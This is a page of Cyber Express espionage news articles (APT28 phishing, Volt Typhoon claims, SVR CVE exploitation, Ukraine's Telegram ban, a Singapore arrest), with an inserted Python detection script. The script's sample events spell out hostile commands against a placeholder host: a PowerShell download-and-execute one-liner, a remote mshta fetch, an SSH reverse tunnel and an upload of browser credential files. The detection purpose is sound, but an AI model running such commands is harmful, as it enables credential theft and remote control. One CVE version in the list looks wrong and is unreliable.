Espionage News

Espionage – The Cyber Express Trending Cybersecurity News, Updates, Magazine and More.

  • ‘I’m not a Robot’ reCAPTCHA Trojanized by Russian Hackers to Target Local Ukrainian Government
    by Mihir Bagwe on October 25, 2024 at 5:36 pm

    Ukraine is confronting a new cyberattack vector from Russian military intelligence (GRU)-connected hackers that is targeting local governments. The Computer Emergency Response Team of Ukraine (CERT-UA) recently uncovered an advanced phishing campaign by the Russian GRU-linked APT28, or “Fancy Bear.” Using a novel approach, attackers lure recipients into executing malicious PowerShell commands directly from their clipboard—a new technique for delivering malware with minimal interaction.

    Google’s reCAPTCHA Lookalike

    Emails flagged by CERT-UA were found circulating within local government offices under the subject line “Table Replacement.” Instead of standard attachments, these emails embed a link mimicking a Google spreadsheet. Clicking the link initiates an imitation of Google’s reCAPTCHA, a tactic used to disarm suspicion by mimicking a bot-prevention screen. However, unlike legitimate reCAPTCHA prompts, this decoy performs an unseen action: it copies a malicious PowerShell command directly to the user’s clipboard. Instructions then prompt users to press “Win+R,” which opens the command prompt, followed by “Ctrl+V” to paste and “Enter” to execute it. Once executed, the payload launches, compromising the system.

    [Image: The Trojanized Google reCAPTCHA and the PowerShell scripts it runs. (Source: CERT-UA)]

    APT28’s tactics demonstrate how these groups exploit familiar actions in routine tasks to mask their intentions. This technique capitalizes on basic system functions and leverages users’ trust in seemingly benign prompts, such as bot verification. CERT-UA’s analysis reveals that the command initiates a download-and-execute sequence. It launches “browser.hta,” a malicious HTML application, which in turn executes “Browser.ps1,” a PowerShell script designed to steal data from popular browsers, including Chrome, Edge, Opera, and Firefox. Additionally, it uses an SSH tunnel for exfiltration, allowing stolen credentials and other sensitive data to be transported directly to the attackers. One of the more concerning aspects is the script’s capability to download and run the Metasploit framework, a tool widely used in penetration testing but increasingly popular among threat actors.

    Fancy Bear Gets Fancy with its Expanding Arsenal

    This isn’t the first time Ukrainian entities have faced APT28’s targeted operations. CERT-UA reported in September that the group used a Roundcube email vulnerability (CVE-2023-43770) to redirect email data.

    [Image: The malicious scripts run after exploitation of the Roundcube vulnerability (Source: CERT-UA)]

    Exploiting this vulnerability enabled attackers to implant a filter that auto-forwarded emails to an attacker-controlled address. During that attack, CERT-UA found that at least ten compromised government email accounts were used to transmit further exploits to Ukrainian defense contacts. In both attacks, APT28 used a compromised server, mail.zhblz[.]com, for control. The IP linked to this server (203.161.50[.]145) has surfaced in prior campaigns, signifying APT28’s evolving operational infrastructure to evade detection while maintaining continuity across attacks. With APT28’s ongoing activity, CERT-UA has recommended that government agencies be on the lookout for increasingly targeted spear-phishing campaigns designed to exploit both user trust and routine tasks.
    Also read: Russian Hacker Group APT28 Launches HeadLace Malware via Fake Car Ads to Target Diplomats

    Indicators of Compromise shared by CERT-UA (file hashes, network indicators and host artifacts) are published in the CERT-UA advisory.
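    The execution chain the article describes (a hidden PowerShell download-and-execute one-liner pasted into Win+R, mshta fetching the remote .hta, tools dropped into %APPDATA%, an SSH tunnel for exfiltration, and the upload of browser credential stores) expressed as detection logic over process-creation events. This is an added example, not code from CERT-UA or The Cyber Express; the events, hostnames and IP are constructed placeholders, and the "parent|command line" log format is an assumption.

```python
"""Detection logic for the ClickFix-style chain described above: a hidden
PowerShell download-and-execute one-liner spawned from explorer.exe (the
Win+R / Ctrl+V / Enter lure), mshta fetching a remote .hta, tools dropped
into %APPDATA%, an SSH reverse tunnel with host-key checking disabled, and
a POST upload of browser credential stores (logins.json, key4.db).

The events below are constructed for this example; hostnames and IPs are
placeholders, not the infrastructure named in the CERT-UA advisory."""
import re

# Process-creation events as "parent image|command line" (assumed format).
SAMPLE_EVENTS = [
    "explorer.exe|powershell -WindowStyle Hidden -nop -exec bypass -c "
    "\"iex (New-Object Net.WebClient).DownloadString('https://c2.example.invalid/B')\"",
    "powershell.exe|mshta https://c2.example.invalid/b",
    r'powershell.exe|powershell -WindowStyle Hidden -nop -exec bypass -c '
    r'"Invoke-WebRequest -Uri https://c2.example.invalid/ssh -OutFile %APPDATA%\ssh.exe"',
    r"powershell.exe|%APPDATA%\ssh.exe tunnel@203.0.113.10 -N -i %APPDATA%\id_rsa "
    r"-R 0 -o StrictHostKeyChecking=no",
    "powershell.exe|powershell -WindowStyle Hidden -nop -exec bypass -c "
    "\"Invoke-RestMethod -Uri https://c2.example.invalid/upload -Method Post "
    "-Body (@{filename='logins.json';file='QUJD'}|ConvertTo-Json)\"",
    # Benign noise: an operator running a signed script from a console.
    r"cmd.exe|powershell -ExecutionPolicy RemoteSigned -File C:\ops\backup.ps1",
    r"explorer.exe|notepad.exe C:\Users\u\notes.txt",
]

# One regex per stage of the chain, matched case-insensitively against the
# command line only.
RULES = {
    "ps_hidden_bypass_remote_exec": re.compile(
        r"powershell.*-w(?:indowstyle)?\s+hidden.*-exec(?:utionpolicy)?\s+bypass"
        r".*(?:iex|invoke-expression)\s*\(.*downloadstring", re.I),
    "mshta_remote_hta": re.compile(r"\bmshta(?:\.exe)?\s+https?://", re.I),
    "ps_drop_to_appdata": re.compile(
        r"invoke-webrequest.*-outfile\s+(?:%appdata%|\$env:appdata)\\", re.I),
    "ssh_reverse_tunnel_no_hostcheck": re.compile(
        r"ssh(?:\.exe)?\s.*\s-r\s+\d+.*stricthostkeychecking=no", re.I),
    "ps_browser_store_upload": re.compile(
        r"invoke-restmethod.*-method\s+post.*(?:logins\.json|key4\.db)", re.I),
}


def scan_events(events):
    """Return a list of (parent, rule_name) for every event/rule match."""
    hits = []
    for event in events:
        parent, _, cmdline = event.partition("|")
        for name, pattern in RULES.items():
            if pattern.search(cmdline):
                hits.append((parent.strip().lower(), name))
    return hits


def run_dialog_chain(events):
    """True when the first stage ran from explorer.exe (what pasting into the
    Run dialog produces) AND at least one later stage of the chain also fired.
    Either condition alone is a lead; together they are the described chain."""
    hits = scan_events(events)
    first_stage = any(parent == "explorer.exe" and name == "ps_hidden_bypass_remote_exec"
                      for parent, name in hits)
    later_stages = {name for _, name in hits} - {"ps_hidden_bypass_remote_exec"}
    return first_stage and bool(later_stages)


if __name__ == "__main__":
    for parent, name in scan_events(SAMPLE_EVENTS):
        print(f"{name:32s} parent={parent}")
    print("chain detected:", run_dialog_chain(SAMPLE_EVENTS))
```

On a real endpoint the Run-dialog stage also leaves the pasted command in the user's RunMRU registry history, which is a useful corroborating artifact during triage.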

  • China Says Volt Typhoon Is U.S. Espionage and Disinformation Campaign
    by Mihir Bagwe on October 15, 2024 at 8:38 pm

    Washington’s narrative – corroborated by Microsoft’s findings – of the China-linked Volt Typhoon group is just a cover for U.S. intelligence hacking into Chinese infrastructure, a 60-page report from Beijing’s top cyber defense agency charged. The report, released on Monday by the National Computer Virus Emergency Response Center (CVERC), accused the U.S. government of meticulously crafting a disinformation campaign aimed at both misdirecting attention and maintaining dominance in the global cyber arena. The allegations point to deep-rooted strategies used by the U.S. to perpetuate its cyber espionage activities while blaming adversaries like China and Russia. But behind the noise lies a much more intricate account of cyber warfare tactics, including the use of False Flag operations and stealth tools designed to mask the true origins of these attacks, the report alleges.

    The ‘Marble’ Toolkit and False Flag Tactics

    At the center of the accusations is a U.S. intelligence toolkit that China calls “Marble.” This tool allegedly helps cloak the true source of cyberattacks by obfuscating the coding signatures typically used to trace attackers. What makes Marble particularly dangerous, according to China’s report, is its ability to insert foreign-language strings into the malware code—languages like Mandarin and Russian—to mislead investigators and pin the blame on foreign actors. False Flag operations, a tactic where one country carries out attacks disguised as another, have become central to modern cyber warfare, China said. In the digital realm, this tactic aims to confuse attribution, the process by which investigators link a cyberattack to its origin. With attribution often serving as the basis for geopolitical decisions, misdirection on this scale could have serious consequences.

    Influence Operations and Cyber Dominance

    The allegations don’t stop at cyberattacks alone. According to CVERC’s investigation, the U.S. has woven these tactics into a broader strategy of influence operations. These operations aim to shape perceptions, spread disinformation, and destabilize target nations. They go beyond the battlefield of bits and bytes, extending into media and public discourse. The report claims the U.S. employs a framework of 4D principles—deny, disrupt, degrade, deceive—to maintain control over the narrative in cyberspace. These principles, seen in disinformation campaigns like Volt Typhoon, are designed to manipulate how cyberattacks are perceived, allowing the U.S. to downplay its own activities while amplifying those of its adversaries. China also came down heavily on naming conventions like “Panda” and “Dragon” used in the attribution of China-linked threat actors, claiming they are geopolitically motivated and equivalent to racial targeting. “Some U.S. companies, such as Microsoft and CrowdStrike, for their commercial interest and without sufficient evidence and rigorous technical analysis, have been keen on coining various absurd codenames with obvious geopolitical overtones for hacker groups, such as ‘typhoon,’ ‘panda,’ and ‘dragon,’ instead of ‘Anglo-Saxon,’ ‘hurricane,’ and ‘koala,’” the CVERC report said.

    Global Surveillance: The ‘UpStream’ and ‘Prism’ Projects

    The core of the accusations against the U.S. is its alleged use of mass surveillance projects, known as “UpStream” and “Prism,” which work together to siphon vast amounts of data from global internet traffic. UpStream, according to the report, is designed to capture raw communication data passing through key internet infrastructure like submarine fiber-optic cables, while Prism allows U.S. intelligence agencies to access user data from major tech companies like Microsoft, Google, and Facebook. By combining these two systems, the U.S. allegedly maintains the ability to monitor vast quantities of data in real time. This capability provides actionable intelligence for military, diplomatic, and economic purposes, making the U.S. a formidable player in the world of cyber espionage. But it’s not just foreign adversaries that are affected. The report suggests that U.S. citizens, despite legal protections like FISA Section 702, also fall under the watchful eye of these surveillance programs. The Foreign Intelligence Surveillance Court itself has acknowledged several violations, pointing to instances where U.S. intelligence agencies allegedly overstepped their bounds, the report suggests.

    Backdoor Implants and Supply Chain Attacks

    Another concerning element is the claim that U.S. intelligence agencies conduct supply chain attacks, where they insert backdoors into hardware and software products sold to foreign targets. Once compromised, these products can act as entry points for further espionage. The National Security Agency’s (NSA) Office of Tailored Access Operations (TAO) allegedly plays a key role in these activities. By intercepting shipments of network equipment, disassembling them, and implanting malicious backdoors, the NSA ensures long-term access to compromised systems. These supply chain attacks represent one of the most covert and effective ways to infiltrate secure networks, posing significant risks to critical infrastructure across the globe, China said.

    Global Fallout: Targeting Allies and Adversaries Alike

    China added that the U.S.’ espionage activities haven’t been limited to adversaries. It said allies such as Germany, France, and Japan have also found themselves under the surveillance lens, with high-level communications reportedly intercepted as part of broader intelligence-gathering efforts. For instance, German Chancellor Angela Merkel’s communications were allegedly monitored by U.S. intelligence, causing a diplomatic rift between the two nations when the operation was exposed, CVERC reported. Similar accusations have surfaced regarding France, with the NSA reportedly eavesdropping on phone calls from French government officials and business leaders.

    U.S. Companies’ Role in Espionage

    Microsoft, one of the largest cloud and enterprise software providers globally, has found itself entangled in these accusations. According to the report, Microsoft’s tools and platforms may be integral to U.S. intelligence operations, providing both the infrastructure and capabilities for data collection. The report also alleges that Microsoft has been developing tools specifically for U.S. intelligence, further deepening its collaboration with the federal government. This relationship, the report suggests, raises serious questions about privacy and the ethical implications of corporate cooperation in state-led surveillance activities. Interestingly, both Microsoft and the U.S. government have time and again placed the same accusations on Volt Typhoon, which China has disputed.

  • Russian SVR Exploiting Unpatched Vulnerabilities in Global Cyber Campaign
    by Mihir Bagwe on October 10, 2024 at 5:14 pm

    Russian Foreign Intelligence Service (SVR) cyber actors are once again in the spotlight, exploiting widespread vulnerabilities in a global campaign aimed at government, technology, and finance sectors. In a new joint advisory, the UK’s National Cyber Security Centre (NCSC) and U.S. agencies warned that SVR cyber operations, known for the SolarWinds attack and targeting COVID-19 vaccine research, have shifted their focus to unpatched software vulnerabilities across a range of sectors.

    “Russian cyber actors are interested in and highly capable of accessing unpatched systems across a range of sectors, and once they are in, they can exploit this access to meet their objectives.” – Paul Chichester, NCSC Director of Operations

    SVR’s Tactics: A Persistent Global Threat

    The SVR, also referred to as APT29 or Cozy Bear, has demonstrated an alarming ability to exploit known vulnerabilities, particularly those left unpatched by organizations. The group is infamous for its persistent and stealthy cyber operations, often targeting government entities, think tanks, and private corporations to collect foreign intelligence. One key aspect of their approach is the two types of targets they pursue. The first includes entities of strategic interest such as governments, financial institutions, and technology companies. These “targets of intent” are carefully selected for their intelligence value. The second group, known as “targets of opportunity,” consists of any organization with unpatched systems that can be exploited for malicious purposes.

    SVR Exploiting Unpatched Vulnerabilities at Scale

    The advisory includes over 20 publicly disclosed vulnerabilities that SVR actors are actively targeting. Organizations across the globe, including those in the UK, are being urged to rapidly deploy patches and prioritize software updates to minimize exposure to these threats. Once SVR actors gain initial access through unpatched systems, they can escalate privileges and move laterally across networks, often compromising connected systems such as supply chains. This enables them to launch further operations, including espionage, data exfiltration, and network disruption. Following is the complete list of unpatched vulnerabilities that Russian SVR was observed exploiting (CVE, vendor/product, details):

    CVE-2023-20198 (Cisco IOS XE Software web UI feature): Privilege escalation vulnerability that allows an attacker to create a local user and password combination
    CVE-2023-4911 (RHSA GNU C Library’s dynamic loader ld.so): Buffer overflow vulnerability that could allow a local attacker to execute code with elevated privileges
    CVE-2023-38545 (Haxx Libcurl): SOCKS5 heap buffer overflow vulnerability
    CVE-2023-38546 (Haxx Libcurl): Missing authorization vulnerability that allows an attacker to insert cookies in a running program if certain conditions are met
    CVE-2023-40289 (Supermicro X11SSM-F, X11SAE-F, and X11SSE-F 1.66): Command injection vulnerability that allows an attacker to elevate privileges
    CVE-2023-24023 (Bluetooth BR/EDR devices with Secure Simple Pairing and Secure Connections pairing in Bluetooth Core Specification 4.2 through 5.4): Allows certain man-in-the-middle attacks that force a short key length [CWE-326], and might lead to discovery of the encryption key and live injection, aka BLUFFS
    CVE-2023-40088 (Android): Use after free vulnerability that could lead to remote (proximal, adjacent) code execution
    CVE-2023-40076 (Google Android 14.0): Permissions bypass vulnerability that allows an attacker to access credentials and escalate local privileges
    CVE-2023-40077 (Google Android 11-14): Use after free vulnerability that can lead to escalation of privileges
    CVE-2023-45866 (Bluetooth HID Hosts in BlueZ): Improper authentication vulnerability that could allow an attacker in close proximity to inject keystrokes and carry out arbitrary commands
    CVE-2022-40507 (Qualcomm): Double free vulnerability
    CVE-2023-36745 (Microsoft Exchange Server): Remote code execution
    CVE-2023-4966 (Citrix NetScaler ADC, NetScaler Gateway): Buffer overflow vulnerability
    CVE-2023-6345 (Google Chrome): Integer overflow vulnerability that allows a remote attacker to potentially perform a sandbox escape via a malicious file
    CVE-2023-37580 (Zimbra): Cross-site scripting (XSS) vulnerability
    CVE-2021-27850 (Apache Tapestry): Critical unauthenticated remote code execution vulnerability
    CVE-2021-41773 (Apache HTTP server 2.4.99): Directory traversal vulnerability
    CVE-2021-42013 (Apache HTTP server 2.4.50): Remote code execution vulnerability
    CVE-2018-13379 (Fortinet FortiGate SSL VPN): Path traversal vulnerability
    CVE-2023-42793 (JetBrains TeamCity): Authentication bypass vulnerability
    CVE-2023-29357 (SharePoint Server): Elevation of privilege vulnerability
    CVE-2023-24955 (SharePoint Server): Remote code execution vulnerability
    CVE-2023-35078 (Ivanti Endpoint Manager Mobile versions through 11.10): Authentication bypass vulnerability
    CVE-2023-5044 (Kubernetes Ingress-nginx): Code injection vulnerability

    Not Just a Cybersecurity Threat: Broader Implications

    The report also sheds light on how SVR actors adapt their techniques to keep pace with evolving technology. The NCSC warns that the group has adjusted its approach in response to the increasing reliance on cloud infrastructure, exploiting cloud misconfigurations and weak security practices. This makes them a formidable adversary for organizations that are migrating or already relying heavily on cloud services. SVR actors have also been linked to recent large-scale attacks, including the supply chain compromise of SolarWinds and a series of spear-phishing campaigns targeting COVID-19 vaccine research. These incidents demonstrate the group’s focus on strategic assets and their potential to impact national security and public health.

    APT29’s Arsenal: From Phishing to Supply Chain Attacks

    The advisory also outlines the tactics, techniques, and procedures (TTPs) employed by SVR cyber actors. Their arsenal includes spear-phishing campaigns, password spraying, supply chain attacks, and the abuse of trusted relationships. These methods allow them to gain initial access and conduct follow-up operations from compromised accounts. For instance, in recent campaigns, SVR actors were found to exploit cloud environments using Microsoft Teams accounts impersonating technical support to trick victims into granting access. By compromising poorly secured small business accounts, they were able to create platforms for targeting high-profile organizations.

    Infrastructure and Evasion Tactics

    SVR cyber actors are known for their ability to remain undetected for extended periods. They frequently use The Onion Router (TOR) network and proxy services to obfuscate their activity. In some cases, they lease infrastructure using fake identities and low-reputation email accounts to avoid detection. When the SVR suspects that its operations have been uncovered, it moves quickly to destroy its infrastructure and any evidence on it. This evasive approach makes it difficult for investigators to trace their operations back to the original source.

    Recent Exploitations: Zimbra, JetBrains, and More

    SVR actors have also been involved in exploiting several high-profile vulnerabilities. For example, the advisory mentions the exploitation of Zimbra mail servers using CVE-2022-27924, a command injection vulnerability that allowed attackers to access user credentials without victim interaction. More recently, they exploited JetBrains TeamCity’s CVE-2023-42793 vulnerability, enabling arbitrary code execution. This kind of exploitation highlights the SVR’s focus on widely used software systems, allowing them to infiltrate a broad range of sectors and geographies.

    Mitigations: What Organizations Can Do

    In light of these ongoing campaigns, the NCSC and U.S. agencies have provided several recommendations to help organizations defend against SVR cyber actors. These include:

    Rapid deployment of patches and updates: Organizations should prioritize software updates as soon as they become available to close known vulnerabilities.
    Multi-factor authentication: Implementing multi-factor authentication across networks and systems can reduce the risk of unauthorized access.
    Auditing cloud accounts: Regularly auditing cloud-based accounts for unusual activity can help detect intrusions before they escalate.
    Reducing attack surface: Disable unnecessary internet-facing services and remove unused applications to limit points of entry for attackers.

  • Russia’s H1 2024 Cyber Offensive Strategy Favored Espionage Over Destruction
    by Mihir Bagwe on September 23, 2024 at 4:47 pm

    Moscow preferred espionage over destruction in its cyber offensive strategy against Ukraine in the first half of 2024, displaying the evolving nature of the Kremlin’s targeted cyberattacks on Kyiv. The cyber battlefield has shifted in 2024, with Russian hacker groups adopting more covert and long-term strategies. Rather than the large-scale infrastructure attacks seen in previous years, Russian cyber operatives have turned to espionage, focusing on military and critical infrastructure targets to support their ongoing war against Ukraine. While cyber incidents have risen overall, the number of high- and critical-severity attacks has dropped. This shift marks a strategic change, moving from broad, destructive cyberattacks to more focused and sustained infiltration efforts aimed at gathering intelligence.

    The Numbers Behind the Attacks

    A report released on Monday by the Computer Emergency Response Team of Ukraine revealed this shift in focus. H1 2024 saw a total of 1,739 cyber incidents, a 19% increase from the second half of 2023. However, the number of critical incidents dropped by 90%, with only three reported in the first half of 2024 compared to 31 in the latter half of 2023. High-severity incidents also saw a sharp decline, falling by 71%, while medium- and low-severity incidents increased by 32% and 75%, respectively.

    [Image: Incident counts by severity (Source: SSSCIP)]

    This data suggests that while the overall frequency of cyberattacks has grown, the attackers’ tactics have shifted towards lower-profile activities designed to avoid detection. These lower-severity incidents often involve malware distribution, espionage, and efforts to maintain access to compromised systems rather than causing immediate, visible damage.

    [Image: Source: SSSCIP]

    Targeted Espionage and Covert Operations

    In 2022 and 2023, Russian hackers focused on disrupting Ukraine’s critical infrastructure, aiming to cripple government agencies, energy providers, and internet service providers (ISPs). However, the swift recovery of Ukraine’s systems meant these attacks did not achieve their intended long-term goals. The 2024 shift towards espionage reflects a more calculated approach. Groups like UAC-0184 and UAC-0020, aka the Vermin hacker group, both linked to Russian intelligence services, have been particularly active this year. These groups specialize in cyber espionage, using phishing campaigns and malicious software to gain access to sensitive systems. UAC-0184, for example, has targeted members of Ukraine’s Defense Forces through messaging apps like Signal, impersonating trusted contacts to distribute malware. Once the malware is deployed, the hackers can monitor communications, steal data, and maintain long-term control over the compromised systems. This pivot from overt attacks to espionage also marks a new phase in Russia’s cyber strategy. Rather than causing immediate disruption, the focus now lies in gathering intelligence to support military operations. CERT-UA’s report highlights how hackers are using cyber operations to collect feedback on kinetic military strikes, such as missile attacks.

    Critical Infrastructure Still in Focus

    Though espionage has taken center stage, attacks on critical infrastructure continue. The report notes that attacks on Ukraine’s energy sector have more than doubled since the latter half of 2023, with hackers increasingly targeting industrial control systems (ICS) used by power, heat, and water supply facilities. The UAC-0002 group, which has ties to Russian law enforcement in occupied Luhansk, executed a significant supply chain attack in March 2024. The hackers exploited vulnerabilities in software used by at least 20 energy companies, gaining access to ICS and using it for lateral movement within the networks. This kind of supply chain attack allows hackers to breach multiple organizations simultaneously by targeting a common service provider. In the March incident, UAC-0002 targeted three supply chains, infecting multiple energy companies with malware and backdoors. The attackers used specialized software, such as LOADGRIP and BIASBOAT, to gain access to critical systems and escalate their attacks, possibly to complement physical strikes on Ukrainian infrastructure.

    Messenger Account Theft: New Entrant in Cyber Offensive Strategy

    Another notable trend in 2024 is the increasing focus on messenger account theft. Platforms like WhatsApp and Telegram, widely used by Ukrainian citizens, have become prime targets for Russian hackers.

    [Image: Source: SSSCIP]

    The UAC-0195 group, for instance, used phishing campaigns to compromise thousands of messenger accounts. These compromised accounts are then used for a range of malicious activities, including spreading malware, conducting espionage, and committing financial fraud. In one instance, hackers posed as organizers of a petition to honor a fallen Ukrainian soldier. They directed victims to a fake website mimicking the President of Ukraine’s official page, where users were asked to authenticate via WhatsApp. This phishing tactic allowed hackers to add their devices to victims’ WhatsApp accounts, gaining access to personal messages, files, and contacts. This tactic extended to Telegram, where hackers used a similar method to lure users into “voting” in an art competition, once again gaining unauthorized access to accounts. With this access, hackers can impersonate the account holder, spread further phishing links, and even steal sensitive information from high-value targets. The latest findings were revealed just days after Ukraine banned the use of the Telegram messenger app on any government, military or critical infrastructure-linked devices. This decisive move follows growing concerns over its vulnerability to cyber espionage. The NCSCC’s meeting on September 19 highlighted how the widely used app has transformed from a tool for free speech into a weapon of war.

    Phishing Campaigns and Malware Distribution

    Phishing remains a key tool for Russian hackers. In early 2024, UAC-0006, a financially motivated group, continued its phishing campaigns targeting employees in financial departments. These campaigns often used polyglot archives—files that appear differently depending on the software used to open them—to deliver malware like SmokeLoader. Once deployed, SmokeLoader allows attackers to install additional malware, such as TALESHOT, which captures screenshots when a banking application is open. This malware enables hackers to gain a deeper understanding of the victim’s activities and access critical financial data. In some cases, hackers even edited or created fraudulent invoices to steal funds from targeted organizations. The UAC-0006 group briefly paused operations in March 2024, but returned in May with renewed efforts, registering new domains to continue phishing attacks and regain control over previously compromised systems.

    Ukraine’s Cyber Resilience: A Battle on Two Fronts

    Despite the rising number of cyberattacks, Ukraine’s cyber defenses have shown remarkable resilience. CERT-UA, in collaboration with the State Service for Special Communications and Information Protection (SSSCIP), has made significant strides in defending against these threats. Their efforts have resulted in a sharp decline in high-severity incidents, even as overall attack numbers rise. The report credits improved visibility and collaboration with international partners for this success. Enhanced detection capabilities, coupled with better awareness among organizations, have allowed Ukraine to respond more quickly to emerging threats. This collaboration includes sharing cyber threat intelligence with CERT-UA’s partners, which has helped identify and mitigate numerous attacks. However, the report also warns that the capabilities of Russian hackers continue to grow as the war drags on. The increasing sophistication of supply chain attacks and the persistent threat of phishing campaigns mean that Ukraine’s cyber defense strategies will be tested time and again.

  • Ukraine Bans Telegram on State-Issued Devices
    by Mihir Bagwe on September 20, 2024 at 3:08 pm

    Telegram CEO Pavel Durov has a new battle to fight as Ukraine bans the Telegram messaging app, citing national security concerns. The National Cybersecurity Coordination Center (NCSCC) in Ukraine has issued a strict directive: ban Telegram in government, military, and critical infrastructure sectors. This decisive move follows growing concerns over its vulnerability to cyber espionage, particularly in the context of Russia’s ongoing full-scale war against Ukraine. The NCSCC’s meeting on September 19 highlighted how the widely used app has transformed from a tool for free speech into a weapon of war.

    Telegram Under the Microscope

    Oleksandr Lytvynenko, Secretary of Ukraine’s National Security and Defense Council, didn’t mince words. He stressed the urgency of unifying efforts to safeguard national security and neutralize threats in cyberspace. His message was seconded by Ukraine’s Defense Intelligence Chief Kyrylo Budanov, who said, “I have always advocated freedom of speech, but the issue of Telegram is not a matter of freedom of speech, it is a matter of national security.”

    Joint Armed and Intelligence Forces’ Meeting held on September 19 (Source: NCSCC)

    Chief among the concerns discussed was Telegram’s susceptibility to Russian intelligence. Budanov presented alarming evidence at the meeting that suggested Russian special services can access user correspondence, including deleted messages, and harvest critical user data. This revelation solidified the case for banning the app across sensitive sectors.

    Telegram App as a Weapon of War

    The problem runs deeper than data breaches. Telegram has become a digital weapon. Representatives from Ukraine’s Security Service (SBU) and the General Staff of the Armed Forces described how Russian operatives use the platform to launch cyberattacks, spread phishing scams, and deliver malware. The app also aids in real-time war operations. Telegram’s geolocation feature allows attackers to pinpoint military positions, adjust missile strikes, and monitor troop movements. Russia’s hybrid warfare tactics blur the lines between traditional combat and cyber warfare, and Telegram serves as one of its sharpest tools, Ukrainian intelligence said.

    The Ban on Telegram: A Necessary Countermeasure

    In light of these threats, Ukraine decided to ban Telegram from the work devices of government officials, military personnel, and staff in critical infrastructure roles. This is not a blanket ban, though. Only individuals whose duties require using the app, likely for intelligence or investigative purposes, are exempt. According to World Population Review, Ukraine currently has 10.76 million Telegram users, the ninth largest user base worldwide. The decision reflects a growing trend in cybersecurity policy, where operational security takes precedence over user convenience. With this move, Ukraine joins other nations tightening their grip on digital platforms that could be compromised by foreign adversaries.

    Securing National Communications During Wartime

    One of the meeting’s key focuses was ensuring the continued stability of Ukraine’s communication networks during Russia’s persistent cyberattacks. Telecommunications companies in Ukraine are under siege, with Russian hackers constantly targeting mobile and internet providers. The stakes are higher now than ever, with compromised communication channels potentially leading to catastrophic military consequences. The NCSCC endorsed a proposal to establish a center for sharing and analyzing cyber threat data, modeled after Europe’s ISACs (Information Sharing and Analysis Centers). The goal is to improve cooperation among telecom providers and government agencies, bolstering the country’s defenses against foreign attacks.

    Cybersecurity Beyond Telegram

    While Telegram has become the headline, the broader issue lies in how Ukraine can maintain cyber resilience under such intense pressure. The NCSCC’s initiatives are part of a larger strategy to strengthen national cybersecurity. One notable move is the creation of an automated platform—CyberTracker—that will monitor and track the implementation of the country’s Cybersecurity Strategy. This tool is expected to enhance long-term strategic planning and help Ukraine stay a step ahead of emerging cyberthreats. Gender equality in the cybersecurity sector also took center stage. The NCSCC approved a national initiative to promote the role of women in cybersecurity, recognizing the importance of diversity in this critical field. As Ukraine ramps up its cyber defenses, the contributions of women will be crucial in filling the talent gap that plagues many countries.

    A War on Information

    Russia’s war on Ukraine is not just a territorial conflict. It is a war on information. Misinformation and disinformation are rampant, with Telegram serving as a hotbed for both. The app’s encryption features, while intended to protect user privacy, have made it an ideal platform for spreading propaganda, manipulating public opinion, and coordinating attacks. For Ukraine, controlling the flow of information has become as crucial as defending its borders. And banning Telegram is just one piece of the puzzle. Kyiv’s decision speaks volumes about the evolving nature of warfare—where cybersecurity, data protection, and national defense are increasingly intertwined. Ukraine’s ban on Telegram comes after the messaging platform’s CEO, Pavel Durov, was detained and arrested by French authorities last month. Durov was picked up at a Paris airport over allegations that his messaging app facilitated criminal activities, including money laundering and drug trafficking. Durov acknowledged that Telegram is not perfect and vowed to improve its processes for handling law enforcement requests, mentioning that the platform already removes millions of harmful posts and channels every day. However, he hit back at the way the entire drama unfolded. Durov is currently out on bail.

    What’s Next?

    Ukraine’s fight against cyber threats will not end with Telegram. The decision to restrict the app marks the beginning of a larger conversation about the role of technology in modern warfare. As state actors continue to exploit digital platforms, governments worldwide will face mounting pressure to rethink their cybersecurity strategies. The NCSCC’s September meeting laid the groundwork for future efforts to strengthen Ukraine’s cyber resilience, but the road ahead is long. For now, though, Ukraine has drawn a clear line in the sand: when it comes to national security, no app is above scrutiny.

  • Global Cybercrime Syndicate Busted in Singapore in Major Police Operation
    by Mihir Bagwe on September 11, 2024 at 10:39 pm

    Tech-savvy criminals operating from luxury condos in Singapore have just learned the hard way that no corner of the globe is out of reach for law enforcement. In an impressive sweep, Singapore’s police arrested six men believed to be part of a global cybercrime syndicate, following coordinated raids on Monday. The suspects—five Chinese nationals and one Singaporean—face charges related to illegal cyber activities, marking one of the largest busts of its kind in the region.

    A Coordinated Strike Against Cybercrime

    The Singapore Police Force mobilized 160 officers in a precision raid that targeted multiple locations across the country. The operation involved the Criminal Investigation Department, Police Intelligence Department, Special Operations Command, and the Internal Security Department. Authorities arrested six men, who they suspect belong to an international cybercrime syndicate involved in various malicious cyber activities, including hacking, theft of personal information, and cryptocurrency-related crimes. Along with the arrests, police seized electronic devices, cash, and cryptocurrency assets worth hundreds of thousands of U.S. dollars.

    A High-Stakes Operation: The Arrests

    One of the more significant arrests occurred at a high-end condominium along Bidadari Park Drive, where police apprehended a 42-year-old Chinese national. Inside his residence, authorities found five laptops, six mobile phones, and a trove of digital evidence, including credentials to access servers linked to notorious hacker groups. The individual had amassed cash totaling more than S$24,000 and held cryptocurrency assets valued at USD $850,000.

    Three other suspects, also Chinese nationals, were arrested at a luxury property along Mount Sinai Avenue. Each suspect played a unique role in the syndicate:

      • A 38-year-old man possessed laptops containing personal data harvested from foreign entities. This kind of data, known as personally identifiable information (PII), includes sensitive details like names, email addresses, and social security numbers that can be exploited for identity theft or blackmail. Police seized more than S$52,000 in cash and other foreign currency.
      • A 35-year-old man was found with a laptop brimming with hacking tools, reportedly preparing for imminent cyberattacks. Such tools are often designed to exploit vulnerabilities in internet servers, giving attackers control over networks and valuable data. Authorities confiscated laptops, phones, and additional cash.
      • A 32-year-old man harbored software capable of controlling malware like PlugX—a remote access Trojan (RAT) known for its stealth capabilities. This sophisticated malware allows attackers to take over machines, gather data, and execute commands remotely. Police seized laptops and mobile devices from his residence.

    A fourth suspect, another 38-year-old Chinese national, was apprehended at his condo on Cairnhill Road. Police suspect this individual was involved in purchasing stolen personal information, underscoring the commercial aspect of modern cybercrime. Investigators confiscated S$465,000 in cash, one laptop, and multiple phones.

    Finally, a 34-year-old Singaporean man was arrested at an HDB block along Hougang Avenue. Authorities believe he acted as an accomplice to the syndicate, aiding in the illegal cyber operations carried out on Singaporean soil.

    PlugX, a Fave Chinese Espionage Tool

    PlugX is a sophisticated Remote Access Tool (RAT) that has been active since approximately 2012. It is used by multiple threat groups for cyber espionage activities, especially China-linked ones. According to Cyble Research and Intelligence Labs, 39 threat actors—all originating from China—have been historically observed using PlugX for espionage.

    Brief list of China-linked threat actors using PlugX RAT (Source: Cyble Research and Intelligence Labs)

